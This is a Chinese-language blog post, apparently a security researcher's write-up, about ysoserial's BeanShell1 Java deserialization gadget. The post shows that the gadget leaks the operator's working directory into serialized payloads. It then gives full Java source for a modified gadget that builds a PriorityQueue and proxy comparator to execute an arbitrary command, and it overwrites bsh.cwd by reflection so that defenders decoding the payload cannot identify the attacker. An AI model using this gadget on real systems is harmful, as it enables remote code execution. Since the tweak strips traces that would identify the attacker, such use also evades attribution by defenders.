有一个gadget正在泄露你的ID
2021-8-25 10:46:57 Author: gv7.me(查看原文) 阅读量:4 收藏

0x01 背景

在Java反序列化漏洞炙手可热的当下,许多自动化工具都在使用ysoserial的gadget。而这些gadget当中,有一个gadget正在偷偷泄露你的id — BeanShell1

BeanShell1泄露当前运行路径

这意味着经常使用shiro批量爆破gadget工具的小伙伴,蓝队同学可能解密下paylaod就能得到你的id了。

0x02 定位信息泄露属性

通过使用java-object-searcher搜索,找到敏感信息存储在bsh.NameSpace类的variables属性中。

存储当前运行路径的属性

通过阅读该类代码,发现只有setTypedVariable方法对variables进行put操作,在该处下断点。

重新调式,看到当前运行路径被put进来后,顺着调用堆栈往上分析。发现BeanShell1Interpreter对象初始化时,调用bsh.Interpreter#initRootSystemObject设置了bsh.cwd值为当前运行路径,最终它被保存到了序列化数据中。

获取当前运行路径

0x03 构造干净的BeanShell1

既然Interpreter对象通过setu方法存储了敏感信息,那么我们同样可以调用该方法将敏感信息覆盖掉,防止信息泄露。

所以要构造一个干净的BeanShell1 gadget,只需要在Interpreter对象创建后反射调用setu方法覆盖bsh.cwd值为.(第13-15行代码)即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({ "org.beanshell:bsh:2.0b5" })
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
public class BeanShell1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {

public PriorityQueue getObject(String command) throws Exception {

String payload = BeanShellUtil.getPayload(command);


Interpreter i = new Interpreter();

Method setu = i.getClass().getDeclaredMethod("setu",new Class[]{String.class,Object.class});
setu.setAccessible(true);
setu.invoke(i,new Object[]{"bsh.cwd","."});



i.eval(payload);


XThis xt = new XThis(i.getNameSpace(), i);
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);


Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);


final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] {1,1};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);

return priorityQueue;
}

}

目前已经给ysoserial项目pr,等待官方修复。当然大家也可以使用我二次开发的ysoserial-for-woopecker

给官方提的pr


文章来源: https://gv7.me/articles/2021/a-gadget-is-secretly-leaking-your-id/
如有侵权请联系:admin#unsafe.sh